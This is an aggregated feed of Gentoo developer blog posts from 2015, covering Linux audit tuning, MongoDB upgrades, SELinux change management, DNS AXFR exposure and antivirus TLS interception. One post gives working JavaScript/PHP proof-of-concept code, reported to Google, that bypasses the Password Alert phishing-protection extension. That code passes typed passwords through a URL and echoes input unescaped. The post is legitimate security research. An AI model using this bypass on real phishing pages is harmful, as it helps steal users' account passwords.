Only when the limits are not reached is the message added to the queue, allowing the user-space audit daemon to consume those events and log those according to the audit configuration. There are some good resources on audit configuration available on the Internet. I find this SuSe chapter worth reading, but many others exist as well.

There is a useful command related to the subject of the audit backlog queue. It queries the audit subsystem for its current status:

# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=1483 rate_limit=0 backlog_limit=8192 lost=3 backlog=0

The command displays not only the audit state (enabled or not) but also the settings for rate limits (on the audit backlog) and backlog limit. It also shows how many events are currently still waiting in the backlog queue (which is zero in our case, so the audit user-space daemon has properly consumed and logged the audit events).

Failure handling

If an audit event cannot be logged, then this failure needs to be resolved. The Linux audit subsystem can be configured to either silently discard the message, switch to the kernel log subsystem, or panic. This can be configured through the audit user-space (auditctl -f [0..2]), but is usually left at the default (which is 1, meaning switch to the kernel log subsystem).

Before that is done, the message is displayed which reveals the cause of the failure handling:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

In this case, the backlog queue was set to contain at most 320 entries (which is low for a production system) and more messages were being added (the Linux kernel in certain cases allows a few more entries than configured, for performance and consistency reasons). The number of events already lost is displayed, as well as the current limitation settings. The message “backlog limit exceeded” can be “rate limit exceeded” if that was the limitation that was triggered.

Now, if the system is not configured to silently discard it, or to panic the system, then the “dropped” messages are sent to the kernel log subsystem. The calls however are also governed through a configurable limitation: it uses a rate limit which can be set through sysctl:

# sysctl -a | grep kernel.printk_rate
kernel.printk_ratelimit = 5
kernel.printk_ratelimit_burst = 10

In the above example, this system allows one message every 5 seconds, but does allow a burst of up to 10 messages at once. When the rate limitation kicks in, then the kernel will log (at most one per second) the number of suppressed events:

[40676.545099] __ratelimit: 246 callbacks suppressed

Although this limit is kernel-wide, not all kernel log events are governed through it. It is the caller subsystem (in our case, the audit subsystem) which is responsible for having its events governed through this rate limitation or not.

Finishing up

Before waving goodbye, I would like to point out that the backlog queue is a memory queue (and not on disk, Red Hat), just in case it wasn’t obvious. Increasing the queue size can result in more kernel memory consumption. Apparently, a practical size estimate is around 9000 bytes per message. On production systems, it is advised not to make this setting too low. I personally set it to 8192.

Lost audit events might result in difficulties for troubleshooting, which is the case when dealing with new or experimental SELinux policies. It would also result in missing security-important events. It is the audit subsystem, after all. So tune it properly, and enjoy the power of Linux’ audit subsystem.

May 09, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Reviving Gentoo VMware support (May 09, 2015, 23:41 UTC)

Sadly, over the last months the support for VMware Workstation and friends in Gentoo has dropped a lot. Why? Well, I was the only developer left who cared, and it's definitely not at the top of my Gentoo priorities list. To be honest, that has not really changed. However... let's try to harness the power of the community now.

I've pushed a mirror of the Gentoo vmware overlay to Github, see


If you have improvements, version bumps, ... - feel free to send pull requests. Everything related to VMware products is acceptable. I hope some more people will sign up over time and help with merging. Just be careful when using the overlay; it likely won't get the same level of review as ebuilds in the main tree.

May 07, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

We’ve been running a nice mongoDB cluster in production for several years now in my company.

This cluster suits quite a wide range of use cases, from very simple configuration collections to collections with complex queries and real-time analytics. This versatility has been the strong point of mongoDB for us since the start, as it allows different teams to address their different problems using the same technology. We also run some dedicated replica sets for other purposes and network segmentation reasons.

We’ve waited a long time to see the latest 3.0 release features happen. The new WiredTiger storage engine arrived at the right time for us, since we had reached the limits of our main production cluster and were considering alternatives.

So, as surprising as it may seem, this is the first part of our mongoDB architecture we’re upgrading to v3.0, as it has become a real necessity.

This post shares our first experience with an ongoing and carefully planned major upgrade of a production cluster; it does not claim to be a definitive migration guide.

Upgrade plan and hardware

The upgrade process is well covered in the mongoDB documentation already but I will list the pre-migration base specs of every node of our cluster.

  • mongodb v2.6.8
  • RAID1 spinning HDD 15k rpm for the OS (Gentoo Linux)
  • RAID10 4x SSD for mongoDB files under LVM
  • 64 GB RAM

Our overall philosophy is to keep most of the configuration parameters to their default values to start with. We will start experimenting with them when we have sufficient metrics to compare with later.

Disk (re)partitioning considerations

The master-gets-all-the-writes architecture is still one of the main limitations of mongoDB and this does not change with v3.0, so you obviously need to challenge your current disk layout to take advantage of the new WiredTiger engine.

mongoDB 2.6 MMAPv1

Considering our cluster data size, we were forced to use our 4 SSDs in a RAID10, as it was the best compromise to preserve performance while providing sufficient data storage capacity.

We often reached the limits of our I/O and moved the journal out of the RAID10 to the mostly idle OS RAID1 with no significant improvements.

mongoDB 3.0 WiredTiger

The main consideration for us is the new feature that allows storing the indexes in a separate directory. Anticipating the reduction in data storage consumption thanks to snappy compression, we decided to split our RAID10 into two dedicated RAID1 arrays.

Our test layout so far is:

  • RAID1 SSD for the data
  • RAID1 SSD for the indexes and journal

Our first node migration

After migrating our mongos and config servers to 3.0, we picked our worst-performing secondary node to test the actual migration to WiredTiger. After all, we couldn’t do worse, right?

We are aware that the strong suit of WiredTiger is actually having the writes directed to it, and we will surely share our experience of that aspect later.

compression is bliss

To make this comparison accurate, we totally resynchronized this node before migrating to WiredTiger, so we could compare non-fragmented MMAPv1 disk usage with the compressed WiredTiger one.

While I can’t disclose the actual values, compression worked like a charm for us with a gain ratio of 3.2 on disk usage (data + indexes), which is way beyond our expectations!

This is the DB Storage graph from MMS, showing a gain ratio of 4, surely because the indexes are on a separate disk now.


memory usage

As with the disk usage, the node had been running hot on MMAPv1 before the actual migration so we can compare memory allocation/consumption of both engines.

There again the memory management of WiredTiger and its cache shows great improvement. For now, we left the default setting which has WiredTiger limit its cache to half the available memory of the system. We’ll experiment with this setting later on.


connections

I’m still not sure of the actual cause, but the connection count is higher and steadier than before on this node.


First impressions

The node has been running smoothly for several hours now. We are getting acquainted with the new metrics and statistics from WiredTiger. The overall node and I/O load is better than before!

While all the above graphs show huge improvements, there is no major change from our applications’ point of view. We didn’t expect any, since this is only one node in a whole cluster and the main benefits will also come from master node migrations.

I’ll continue to share our experience and progress about our mongoDB 3.0 upgrade.

May 06, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

It's time to announce yet another nice result. Our manuscript "Transport across a carbon nanotube quantum dot contacted with ferromagnetic leads: experiment and non-perturbative modeling" has been accepted as a regular article by Physical Review B.
When ferromagnetic materials are used as contacts for a carbon nanotube at low temperature, the current is strongly influenced by the direction of the contact magnetization via the so-called tunneling magnetoresistance (TMR). Since the nanotube contains a quantum dot, in addition its electronic energy levels play an important role; the TMR depends on the gate voltage value and can reach large negative and positive values. Here, in another fruitful joint experimental and theoretical effort, we present both measurements of the gate-dependent TMR across a "shell" of four Coulomb oscillations, and model them in the so-called "dressed second order" framework. The calculations nicely reproduce the characteristic oscillatory patterns of the TMR gate dependence.

"Transport across a carbon nanotube quantum dot contacted with ferromagnetic leads: experiment and non-perturbative modeling"
A. Dirnaichner, M. Grifoni, A. Prüfling, D. Steininger, A. K. Hüttel, and Ch. Strunk
Phys. Rev. B 91, 195402 (2015); arXiv:1502.02005 (PDF)

May 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

We're happy to be able to announce that our manuscript "Broken SU(4) symmetry in a Kondo-correlated carbon nanotube" has been accepted for publication in Physical Review B.
This manuscript is the result of a joint experimental and theoretical effort. We demonstrate that there is a fundamental difference between cotunneling and the Kondo effect - a distinction that has been debated repeatedly in the past. In carbon nanotubes, the two graphene-derived Dirac points can lead to a two-fold valley degeneracy in addition to spin degeneracy; each orbital "shell" of a confined electronic system can be filled with four electrons. In most nanotubes, these degeneracies are broken by the spin-orbit interaction (due to the wall curvature) and by valley mixing (due to, as recently demonstrated, scattering at the nanotube boundaries). Using an externally applied magnetic field, the quantum states involved in equilibrium (i.e., elastic, zero-bias) and nonequilibrium (i.e., inelastic, finite bias) transitions can be identified. We show theoretically and experimentally that in the case of Kondo correlations, not all quantum state pairs contribute to Kondo-enhanced transport; some of these are forbidden by symmetries stemming from the carbon nanotube single particle Hamiltonian. This is distinctly different from the case of inelastic cotunneling (at higher temperatures and/or weaker quantum dot-lead coupling), where all transitions have been observed in the past.

"Broken SU(4) symmetry in a Kondo-correlated carbon nanotube"
D. R. Schmid, S. Smirnov, M. Marganska, A. Dirnaichner, P. L. Stiller, M. Grifoni, A. K. Hüttel, and Ch. Strunk
Phys. Rev. B 91, 155435 (2015) (PDF)

Nirbheek Chauhan a.k.a. nirbheek (homepage, bugs)
A Transcoding Proxy for HTTP Video Streams (May 04, 2015, 07:43 UTC)

Sometime last year, we worked on a client project to create a prototype for a server that is, in essence, a "transcoding proxy". It accepts N HTTP client streams and makes them available for an arbitrary number of clients via HTTP GET (and/or over RTP/UDP) in the form of WebM streams. Basically, it's something similar to Twitch.tv. The terms of our work with the client allowed us to make this work available as Free and Open Source Software, and this blog post is the announcement of its public availability.

Go and try it out!

git clone http://code.centricular.com/soup-transcoding-proxy/

The purpose of this release is to demonstrate some of the streaming/live transcoding capabilities of GStreamer and the capabilities of LibSoup as an HTTP server library. Some details about the server follow, but there's more documentation and examples on how to use the server in the git repository.

In addition to using GStreamer, the server uses the GNOME HTTP library LibSoup for implementing the HTTP server which accepts and makes available live HTTP streams. Stress-testing for up to 100 simultaneous clients has been done with the server, with a measured end-to-end stream latency of between 150ms to 250ms depending on the number of clients. This can be likely improved by using codecs with lower latency and so on—after all the project is just a prototype. :)

The N client streams sent to the proxy via HTTP PUT/PUSH are transcoded to VP8/Vorbis WebM if needed, but are simply remuxed and passed through if they are in the same format. Optionally, the proxy can also broadcast each client stream to a list of pre-specified hosts via RTP/UDP.

Clients that want to stream video from the server can connect or disconnect at any time, and will get the current stream whenever they (re)connect. The server also accepts HTTP streams via both Chunked-Encoding and fixed-length HTTP PUT requests.
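
As an illustration, this is roughly how a client could push a pre-recorded WebM file to such an endpoint with a chunked PUT using the Python requests library; the endpoint URL and session id below are made up, see the repository documentation for the actual API:

# Hedged sketch: push a WebM file to the proxy with a chunked HTTP PUT.
# The endpoint URL and session id are made up; check the repository docs.
import requests

def read_in_chunks(path, chunk_size=64 * 1024):
    with open(path, "rb") as stream:
        while True:
            chunk = stream.read(chunk_size)
            if not chunk:
                break
            yield chunk

# Passing a generator makes requests use Transfer-Encoding: chunked.
response = requests.put(
    "http://localhost:8080/stream/my-session-id",  # hypothetical endpoint
    data=read_in_chunks("recording.webm"),
    headers={"Content-Type": "video/webm"},
)
print(response.status_code)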

There is also a JSON-based REST API to interact with the server, as well as built-in validation via a Token Server. A specified host (or address mask) can be whitelisted, allowing it to add or remove session id tokens along with details about the types of streams that the specified session id is allowed to send to the server, and the types of streams that will be made available by the proxy. For more information, see the REST API documentation.

We hope you find this example instructive in how to use LibSoup to implement an HTTP server and in using GStreamer for streaming and encoding purposes. Looking forward to hearing from you about it!

May 02, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

A few days ago Google released a Chrome extension that emits a warning if a user types in his Google account password on a foreign webpage. This is meant as a protection against phishing pages. Code is on Github and the extension can be installed through Google's Chrome Web Store.

When I heard this the first time I already thought that there are probably multiple ways to bypass that protection with some Javascript trickery. Seems I was right. Shortly after the extension was released security researcher Paul Moore published a way to bypass the protection by preventing the popup from being opened. This was fixed in version 1.4.

At that point I started looking into it myself. Password Alert tries to record every keystroke from the user and checks if that matches the password (it doesn't store the password, only a hash). My first thought was to simulate keystrokes via Javascript. I have to say that my Javascript knowledge is close to nonexistent, but I can use Google and read Stackoverflow threads, so I came up with this:

<script>
function simkey(e) {
if (e.which==0) return;
var ev=document.createEvent("KeyboardEvent");
ev.initKeyboardEvent("keypress", true, true, window, 0, 0, 0, 0, 0, 0);
document.getElementById("pw").dispatchEvent(ev);
}
</script>
<form action="" method="POST">
<input type="password" id="pw" name="pw" onkeypress="simkey(event);">
<input type="submit">
</form>


For every key a user presses this generates a Javascript KeyboardEvent. This is enough to confuse the extension. I reported this to the Google Security Team and Andrew Hintz. Literally minutes before I sent the mail a change was committed that did some sanity checks on the events and thus prevented my bypass from working (it checks the charcode and it seems there is no way in webkit to generate a KeyboardEvent with a valid charcode).

While I did that, Paul Moore also created another bypass which relies on page reloads. A new version 1.6 was released fixing both my and Moore's bypasses.

I gave it another try and after a couple of failures I came up with a method that still works. The extension will only store keystrokes entered on one page. So what I do is that on every keystroke I create a popup (with the already-typed password still in the form field) and close the current window. The closing doesn't always work; I'm not sure why that's the case, and it can probably be improved somehow. There's also some flickering in the tab bar. The password is passed via URL; this could also happen otherwise (converting that from a GET to a POST variable is left as an exercise to the reader). I'm also using PHP here to insert the variable into the form; this could be done in pure Javascript. Here's the code, still working with the latest version:

<script>
function rlt() {
window.open("https://test.hboeck.de/pw2/?val="+document.getElementById("pw").value);
self.close();
}
</script>
<form action="." method="POST">
<input type="text" name="pw" id="pw" onkeyup="rlt();" onfocus="this.value=this.value;" value="<?php
if (isset($_GET['val'])) echo $_GET['val'];
?>">
<input type="submit">
<script>
document.getElementById("pw").focus();
</script>


Honestly I have a lot of doubts whether this whole approach is a good idea. There are just too many ways this can be bypassed. I know that passwords and phishing are a big problem, I just doubt this is the right approach to tackle it.

One more thing: When I first tested this extension I was confused, because it didn't seem to work. What I didn't know is that this purely relies on keystrokes. That means when you copy-and-paste your password (e. g. from some textfile in a crypto container) then the extension will provide you no protection. At least to me this was very unexpected behaviour.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
New personal gamestation! (May 02, 2015, 00:33 UTC)

Besides a new devbox that I talked about setting up, now that I no longer pay for the tinderbox I also decided to buy myself a new PC for playing games (so Windows-bound, unfortunately), replacing Yamato, which has been serving me well for years at this point.

Given we've talked about this at the office as well, I'll write down the specs over here, with the links to Amazon (where I bought the components), as I know a fair number of people are always interested to know specs. I will probably write down some reviews on Amazon itself as well as on the blog, for the components that can be discussed "standalone".

  • CPU: Intel i7 5930K (Amazon UK), hex-core Haswell-E; it was intended as a good compromise between high performance and price, not only for gaming but also for Adobe Lightroom.
  • Motherboard: Asus X99-S (Amazon UK)
  • Memory: Crucial Ballistix 32GB (8GBx4) (Amazon UK) actually this one I ordered from Crucial directly, because the one I originally ordered on Amazon UK was going to ship from Las Vegas, which meant I had to pay customs on it. I am still waiting for that one to be fully cancelled, but then Crucial was able to deliver an order placed on Wednesday at 10pm by Friday, which was pretty good (given that this is a long weekend in Ireland.)
  • Case: Fractal Design Define R5 (Amazon UK) upon suggestion of two colleagues, one who only saw it in reviews, the other actually having the previous version. It is eerily quiet and very well organized; it would also fit a huge amount of storage if I needed to build a new NAS rather than a desktop PC.
  • CPU cooler: NZXT Kraken X61 (Amazon UK) I went with water cooling for the CPU because I did not like the size of the copper fins in the other alternatives of suggested coolers for the chosen CPU. Since this is a completely sealed system it didn't feel too bad. The only shaky part is that the only proper space for this to fit into the case is on the top-front side, and it does require forcing the last insulation panel in a little bit.

Now you probably noticed some parts missing; the reason is that I have bought a bunch of components to upgrade Yamato over the past year and a half, since being employed also means being able to just scratch your itch for power more easily, especially if you, like me, are single and not planning a future as a stock player. Some of the upgrades are still pretty good and others are a bit below average now (and were barely average when I bought them), but I think it might be worth listing them still.

  • SSD: Samsung 850 EVO (Amazon UK) and Crucial M550 (Amazon UK), both 1TB. The reason for having two different ones is that the latter (which was the first of the two) was not available when I decided to get a second one, and the reason for getting a second one was that I realized that while keeping pictures on the SSD helped a lot, the rest of the OS was still too slow…
  • GPU: Asus GeForce GTX660 (Amazon UK) because I needed something good that didn't cost too much at the time.
  • PSU: be quiet! Dark Power Pro 1200W (Amazon UK) which I had to replace when I bought the graphics card, as the one I had before didn't have the right PCI-E power connectors, or rather it had one too few. Given that Yamato is a Dual-Quad Opteron, with registered ECC memory, I needed something that would at least take 1kW; I'm not sure how much it's consuming right now to be honest.

We'll see how it fares once I have it fully installed and started playing games on it, I guess.

May 01, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)
DNS AXFR scan data (May 01, 2015, 22:25 UTC)

I was recently made aware of an issue: many authoritative nameservers answer AXFR requests from anyone. AXFR is a feature of the Domain Name System (DNS) that allows querying a complete zone from a name server. That means one can find out all subdomains of a given domain.

If you want to see what this looks like, Verizon kindly provides a DNS server that will answer AXFR requests with a very large zone:
dig axfr verizonwireless.com @ns-scrm.verizonwireless.com

This by itself is not a security issue. It can however become a problem if people consider some of their subdomains / URLs secret. While checking this issue I found one example where such a subdomain contained a logging interface that exposed data that was certainly not meant to be public. However it is a bad idea in general to have "secret" subdomains, because there is no way to keep them really secret. DNS itself is not encrypted, therefore by sniffing your traffic it is always possible to see your "secret" subdomains.

AXFR is usually meant to be used between trusting name servers, and requests from arbitrary public IPs should not be answered. While it is in theory possible that someone considers publicly available AXFR a desired feature, I assume that in the vast majority of cases these are just misconfigurations that were never intended to be public. I contacted a number of the affected operators, and of those who answered none claimed that this was an intended configuration. I'd generally say that it's wise to disable services you don't need. US-CERT recently issued an advisory about this issue.
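
If you run your own domains, a quick way to check is to ask each of their authoritative name servers for a zone transfer. Here is a rough sketch; example.com is just a placeholder for your own domain:

# check every authoritative name server of a domain for open AXFR
domain=example.com
for ns in $(dig +short NS "$domain"); do
    echo "== $ns"
    # an open server dumps the zone; a locked-down one reports "Transfer failed."
    dig +noall +answer AXFR "$domain" "@$ns" | head -n 5
done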

I have made a scan of the Alexa top 1 million web pages and checked whether their DNS servers answer AXFR requests. The University of Michigan has a project to collect data from Internet scans and I submitted my scan results to them. So you're welcome to download and analyze the data.

April 30, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

If you are using SELinux on production systems (by which I mean systems that offer services to customers or other parties beyond you, yourself and your ego), please consider proper change management if you don't practice it already. SELinux is a very sensitive security subsystem – not in the sense that it fails easily, but in the sense that it is very fine-grained and as such can easily stop applications from running when their behavior changes just a tiny bit.

Sensitivity of SELinux

SELinux is a wonderful security measure for Linux systems that can prevent successful exploitation of vulnerabilities or misconfigurations. Of course, it is not the sole security measure that systems should take. Proper secure configuration of services, least privilege accounts, kernel-level mitigations such as grSecurity and more are other measures that certainly need to be taken if you really find system security to be a worthy goal to attain. But I’m not going to talk about those others right now. What I am going to focus on is SELinux, and how sensitive it is to changes.

An important functionality of SELinux to understand is that it segregates the security control system itself (the SELinux subsystem) from its configuration (the policy). The security control system itself is relatively small, and focuses on enforcement of the policy and logging (either because the policy asks to log something, or because something is prevented, or because an error occurred). The most difficult part of handling SELinux on a system is not enabling or interacting with it. No, it is its policy.

The policy is also what makes SELinux so darn sensitive to small system changes (or to behavior that is not covered, or at least not allowed, by the existing policy). Let me explain with a small situation I ran into recently.

Case in point: Switching an IP address

A case that beautifully shows how sensitive SELinux can be is an IP address change. My systems all obtain their IP address (at least for IPv4) from a DHCP system. This is of course acceptable behavior as otherwise my systems would never be able to boot up successfully anyway. The SELinux policy that I run also allows this without any hindrance. So that was not a problem.

Yet recently I had to switch an IP address for a system in production. All the services I run are set up in a dual-active mode, so I started the change by draining the services to the second system, shutting down the service and then (after reconfiguring the DHCP system to provide a different IP address) reloading the network configuration. And then it happened – the DHCP client just stalled.

As the change failed, I updated the DHCP system again to deliver the old IP address and then reloaded the network configuration on the client. Again, it failed. Dumbstruck, I looked at the AVC denials and, lo and behold, noticed a dig process running in a DHCP-client-related domain trying to do UDP binds, which the policy (at that time) did not allow. But why now, all of a sudden? After all, this system had been running happily for more than a year (with occasional reboots for kernel updates).

I won’t bore you with the investigation. It boils down to the fact that the DHCP client detected a change compared to previous startups, and was configured to run a few hooks as additional steps in the IP lease setup. As these hooks had never run before, the policy had never been confronted with this behavior. And since the address change had already occurred, reverting to the previous situation didn’t work either (the previous state information was already deleted).

I was able to revert the client (which is a virtual guest in KVM) to the situation right before the change (thank you, savevm and loadvm) so that I could first work on the policy in a non-production environment; the next change attempt was then successful.
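
For those who have not done this kind of investigation before, the usual workflow is to read the denials and derive candidate policy rules from them. A minimal sketch (the dhcpc filter matches the DHCP client domain in the reference policy, the module name is arbitrary, and generated rules should always be reviewed rather than loaded blindly):

# show the recent AVC denials for the DHCP client domain
ausearch -m avc -ts recent | grep dhcpc
# turn the denials into a candidate policy module and review it
ausearch -m avc -ts recent | audit2allow -M dhcp_hooks
less dhcp_hooks.te
# load it only once you agree with the generated rules
semodule -i dhcp_hooks.pp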

Change management

The previous situation might be “solved” by temporarily putting the DHCP client domain in permissive mode just for the change and then switching back. But that is ignoring the issue, and unless you have perfect operational documentation that you always read before making system or configuration changes, I doubt that you’ll remember this the next time.
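
For completeness, that workaround would look roughly like this (assuming dhcpc_t is the DHCP client domain in your policy):

# put only the DHCP client domain in permissive mode for the duration of the change
semanage permissive -a dhcpc_t
# ... perform and verify the change ...
semanage permissive -d dhcpc_t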

The case is also a good example of the sensitivity of SELinux. It is not just software upgrades: every change (be it in configuration, behavior or operational activity) might result in a situation that is new to the loaded SELinux policy. As the default action in SELinux is to deny everything, this results in unexpected behavior on the system. Sometimes it is very visible (no IP address obtained), sometimes hidden behind some weird behavior (hostname correctly set but not the domain name), and sometimes it isn’t even noticed until far later. Compare it to firewall rule configurations: you might easily confirm that standard flows still pass through, but how certain are you that fallback flows or once-a-month connection setups are not suddenly being blocked?

A somewhat better solution than just temporarily disabling SELinux access controls for a domain is to look into proper change management. Whenever a change has to be done, make sure that you

  • can easily revert the change back to the previous situation (backups!)
  • have tested the change on a non-vital (preproduction) system first

These two principles are pretty vital when you are serious about using SELinux in production. I’m not talking about a system that hardly has any fine-grained policies, like where most of the system’s services are running in “unconfined” domains (although that’s still better than not running with SELinux at all), but where you are truly trying to put a least privilege policy in place for all processes and services.

Being able to revert a change allows you to quickly get a service up and running again so that customers are not affected by the change (and potential issues) for a long time. First fix the service, then fix the problem. If you are an engineer like me, you might rather focus on the problem (and a permanent, correct solution) first. But that’s wrong – always first make sure that the customers are not affected by it. Revert and put the service back up, and then investigate so that the next change attempt will not go wrong anymore.

Having a multi-master setup might give some more leeway for investigating issues (as the service itself is not disrupted), so in the case mentioned above I would probably have tried fixing the issue immediately anyway if it hadn’t been policy-based. But most users do not have truly multi-master service setups.

Being able to test (and retest) changes in non-production also allows you to focus on automation (so that changes can be done faster and in a repeated, predictable and qualitative manner), regression testing as well as change accumulation testing.

You don’t have time for that?

Be honest with yourself. If you support services for others (be it in a paid-for manner or because you support an organization in your free time) you’ll quickly learn that service availability is one of the most important quality aspects of what you do. No matter what mess is behind it, most users don’t see all that. All they see is the service itself (and its performance / features). If a change you wanted to make made a service unavailable for hours, users will notice. And if the change wasn’t communicated up front, or it is the n-th time that this downtime occurs, they will start asking questions you’d rather not hear.

Using a non-production environment is not that much of an issue if the infrastructure you work with supports bare metal restores, or snapshotting/cloning (in the case of VMs). After doing those a couple of times, you’ll easily find that you can create a non-production environment from the production one. Or you can go for a permanent non-production environment (although you’ll need to take care that this environment is at all times representative of the production systems).

And regarding qualitative changes, I really recommend using a configuration management system. I recently switched from Puppet to Saltstack and have yet to use the latter to its fullest (most of what I do is still scripted), but it is growing on me and I’m pretty convinced that I’ll have replaced the majority of my change management scripts with Saltstack-based configurations by the end of this year. And that will allow me to automate changes and thus provide a higher-quality service offering.

With SELinux, of course.

April 29, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Code Hygiene (April 29, 2015, 03:03 UTC)

Some convenient Makefile targets that make it very easy to keep code clean:

scan:
        scan-build clang foo.c -o foo

indent:
        indent -linux *.c

scan-build is llvm/clang's static analyzer and generates some decent warnings. Using clang to build (in addition to the 'default' gcc in my case) adds diversity and sometimes catches different errors.

indent makes the code pretty; the 'linux' default settings are not exactly what I want, but close enough that I don't care to fine-tune them yet.
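
scan-build can also wrap a whole build and keep browsable HTML reports, which is handy once a project grows beyond a single file. A sketch (the output directory name is arbitrary):

# analyze everything the default make target builds, storing HTML reports
scan-build -o ./analyzer-reports make
# open the generated report (scan-build prints the exact directory at the end)
scan-view ./analyzer-reports/*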

Every commit should be properly indented and not cause more warnings to appear!

April 27, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Moving closer to 2.4 stabilization (April 27, 2015, 17:18 UTC)

The SELinux userspace project released version 2.4 in February this year, after release candidates had been tested for half a year. Since its release, we at the Gentoo Hardened project have been working hard to integrate it into Gentoo. This effort has been made a bit more difficult by the migration of the policy store from one location to another, combined with the switch to HLL- and CIL-based builds.

Lately, 2.4 itself has been pretty stable, and we’re focusing on the proper migration from 2.3 to 2.4. The SELinux policy has been adjusted to allow the migrations to work, and a few final fixes are being tested so that we can safely transition our stable users from 2.3 to 2.4. Hopefully we’ll be able to stabilize the userspace this month or beginning of next month.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Comment vulnerability in WordPress 4.2 (April 27, 2015, 13:21 UTC)

Hanno Böck tweeted about WordPress 4.2 Stored XSS rather recently. The short version is: if an attacker can comment on your blog, your blog is owned.

Since the latest release is affected and is the version I am using, I have been looking for a way to disable comments globally, at least until a fix has been released.
I’m surprised how difficult disabling comments globally is.

Option “Allow people to post comments on new articles” is filed under “Default article settings”, so it applies to new posts only. Let’s disable that.
There is a plug-in, Disable comments, but since it claims not to alter the database (unless in persistent mode), I have a feeling that it may only remove commenting forms but leave commenting active for hand-made GET/POST requests, so that may not be safe.

So without studying WordPress code in depth my impression is that I have two options:

  • a) restrict comments to registered users, deactivate registration (hoping that all existing users are friendly and that disabled registration is waterproof in 4.2) and/or
  • b) disable comments for future posts in the settings (in case I post again before an update) and for every single post from the past.

On database level, the former can be seen here:

mysql> SELECT option_name, option_value FROM wp_options
           WHERE option_name LIKE '%regist%';
+----------------------+--------------+
| option_name          | option_value |
+----------------------+--------------+
| users_can_register   | 0            |
| comment_registration | 1            |
+----------------------+--------------+
2 rows in set (0.01 sec)

For the latter, this is how to disable comments on all previous posts:

mysql> UPDATE wp_posts SET comment_status = 'closed';
Query OK, .... rows affected (.... sec)
Rows matched: ....  Changed: ....  Warnings: 0

If you have comments to share, please use e-mail this time. Upgraded to 4.2.1 now.

April 26, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Intercepted certificate by Avast

Lately a lot of attention has been paid to software like Superfish and Privdog that intercepts TLS connections in order to manipulate HTTPS traffic. These programs had severe (technically different) vulnerabilities that allowed attacks on HTTPS connections.

What these tools do is a widespread technique: they install a root certificate into the user's browser and then perform a so-called Man-in-the-Middle attack. They present the user with a certificate generated on the fly and manage the connection to HTTPS servers themselves. Superfish and Privdog did this in obviously wrong ways, Superfish by using the same root certificate on all installations and Privdog by simply accepting every invalid certificate from web pages. What about other software that also does MitM interception of HTTPS traffic?

Antivirus software intercepts your HTTPS traffic

Many Antivirus applications and other security products use similar techniques to intercept HTTPS traffic. I had a closer look at three of them: Avast, Kaspersky and ESET. Avast enables TLS interception by default. Kaspersky by default intercepts connections to certain web pages (e.g. banking); there is an option to enable interception for all connections. In ESET, TLS interception is disabled by default and can be enabled with an option.

When a security product intercepts HTTPS traffic, it is itself responsible for creating a TLS connection and checking the certificate of a web page. It has to do what a browser would otherwise do. There has been a lot of debate and progress in the way TLS is done over the past years. A number of vulnerabilities in TLS (among them BEAST, CRIME, Lucky Thirteen, FREAK and others) taught us a lot about how to do TLS in a secure way. Also, problems with certificate authorities that issued malicious certificates (DigiNotar, Comodo, Türktrust and others) led to the development of mitigation technologies like HTTP Public Key Pinning (HPKP) and Certificate Transparency to strengthen the security of certificate authorities. Modern browsers protect users much better from various threats than browsers from several years ago.

You may think: "Of course security products like Antivirus applications are fully aware of these developments and do TLS and certificate validation in the best way possible. After all security is their business, so they have to get it right." Unfortunately that's only what's happening in some fantasy IT security world that only exists in the minds of people that listened to industry PR too much. The real world is a bit different: All Antivirus applications I checked lower the security of TLS connections in one way or another.

Disabling of HTTP Public Key Pinning

Each and every TLS intercepting application I tested breaks HTTP Public Key Pinning (HPKP). It is a technology that a lot of people in the IT security community are pretty excited about: It allows a web page to pin public keys of certificates in a browser. On subsequent visits the browser will only accept certificates with these keys. It is a very effective protection against malicious or hacked certificate authorities issuing rogue certificates.

Browsers made a compromise when introducing HPKP. They won't enable the feature for manually installed certificates. The reason for that is simple (although I don't like it): If they hadn't done that they would've broken all TLS interception software like these Antivirus applications. But the applications could do the HPKP checking themselves. They just don't do it.
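
If you are curious what such pins look like on the wire, the header is easy to inspect; a sketch (example.com stands in for a site that actually sends it):

# dump the HPKP header of a site that deploys it
curl -sI https://example.com/ | grep -i '^public-key-pins'
# typical content: pin-sha256="..."; pin-sha256="..."; max-age=...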

Kaspersky vulnerable to FREAK and CRIME

Having a look at Kaspersky, I saw that it is vulnerable to the FREAK attack, a vulnerability in several TLS libraries that was found recently. Even worse: it seems this issue was reported publicly in the Kaspersky forums more than a month ago and has not been fixed yet. Please remember: Kaspersky enables HTTPS interception by default for sites it considers especially sensitive, for example banking web pages. Doing that with a known security issue is extremely irresponsible.

I also found a number of other issues. ESET doesn't support TLS 1.2 and therefore uses a less secure encryption algorithm. Avast and ESET don't support OCSP stapling. Kaspersky enables the insecure TLS compression feature, which makes a user vulnerable to the CRIME attack. Both Avast and Kaspersky accept nonsensical parameters for Diffie-Hellman key exchanges with a size of 8 bits. Avast is especially interesting because it bundles the Google Chrome browser: it installs a browser with advanced HTTPS features and lowers its security right away.
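
You can check some of these properties yourself from a machine running the intercepting software; a rough sketch with openssl (example.com stands in for any intercepted HTTPS site, and the results only say something about the product if it actually rewrites the connection):

# if this handshake succeeds, export-grade (FREAK-style) ciphers are being accepted
openssl s_client -connect example.com:443 -cipher EXPORT < /dev/null
# the "Compression:" line should read NONE; anything else means TLS compression (CRIME) is enabled
openssl s_client -connect example.com:443 < /dev/null 2>/dev/null | grep -i '^compression'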

These TLS features are all things that current versions of Chrome and Firefox get right. If you use them in combination with one of these Antivirus applications you lower the security of HTTPS connections.

